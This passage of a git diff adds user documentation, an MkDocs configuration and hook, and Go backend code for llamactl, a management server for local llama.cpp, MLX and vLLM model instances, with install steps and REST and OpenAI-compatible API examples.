default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,105 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,190 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

BIN
docs/images/dashboard.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

34
docs/index.md Normal file
View File

@@ -0,0 +1,34 @@
# Llamactl Documentation
Welcome to the Llamactl documentation!
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
**{{HEADLINE}}**
## Features
{{FEATURES}}
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

62
docs/readme_sync.py Normal file
View File

@@ -0,0 +1,62 @@
"""
MkDocs hook to sync content from README.md to docs/index.md
"""
import re
import os
def on_page_markdown(markdown, page, config, **kwargs):
"""Process markdown content before rendering"""
# Only process the index.md file
if page.file.src_path != 'index.md':
return markdown
# Get the path to README.md (relative to mkdocs.yml)
readme_path = os.path.join(os.path.dirname(config['config_file_path']), 'README.md')
if not os.path.exists(readme_path):
print(f"Warning: README.md not found at {readme_path}")
return markdown
try:
with open(readme_path, 'r', encoding='utf-8') as f:
readme_content = f.read()
except Exception as e:
print(f"Error reading README.md: {e}")
return markdown
# Extract headline (the text in bold after the title)
headline_match = re.search(r'\*\*(.*?)\*\*', readme_content)
headline = headline_match.group(1) if headline_match else 'Management server for llama.cpp and MLX instances'
# Extract features section - everything between ## Features and the next ## heading
features_match = re.search(r'## Features\n(.*?)(?=\n## |\Z)', readme_content, re.DOTALL)
if features_match:
features_content = features_match.group(1).strip()
# Just add line breaks at the end of each line for proper MkDocs rendering
features_with_breaks = add_line_breaks(features_content)
else:
features_with_breaks = "Features content not found in README.md"
# Replace placeholders in the markdown
markdown = markdown.replace('{{HEADLINE}}', headline)
markdown = markdown.replace('{{FEATURES}}', features_with_breaks)
# Fix image paths: convert docs/images/ to images/ for MkDocs
markdown = re.sub(r'docs/images/', 'images/', markdown)
return markdown
def add_line_breaks(content):
"""Add two spaces at the end of each line for proper MkDocs line breaks"""
lines = content.split('\n')
processed_lines = []
for line in lines:
if line.strip(): # Only add spaces to non-empty lines
processed_lines.append(line.rstrip() + ' ')
else:
processed_lines.append(line)
return '\n'.join(processed_lines)

View File

@@ -0,0 +1,527 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,229 @@
# Managing Instances
Learn how to effectively manage your llama.cpp, MLX, and vLLM instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
```bash
# Create llama.cpp instance with local model file
curl -X POST http://localhost:8080/api/instances/my-llama-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"top_p": 0.9,
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"auto_restart": true,
"on_demand_start": true,
"environment": {
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
- [llama-server docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
- [MLX-LM docs](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
- [vLLM docs](https://docs.vllm.ai/en/latest/)
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

79
mkdocs.yml Normal file
View File

@@ -0,0 +1,79 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
- mike:
version_selector: true
css_dir: css
javascript_dir: js
canonical_version: null
hooks:
- docs/readme_sync.py
extra:
version:
provider: mike
default: stable
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

10
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,10 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)

93
pkg/backends/builder.go Normal file
View File

@@ -0,0 +1,93 @@
package backends
import (
"fmt"
"llamactl/pkg/config"
"reflect"
"strconv"
"strings"
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
var args []string
v := reflect.ValueOf(options).Elem()
t := v.Type()
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
if !field.CanInterface() {
continue
}
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
} else {
// Comma-separated: --flag value1,value2
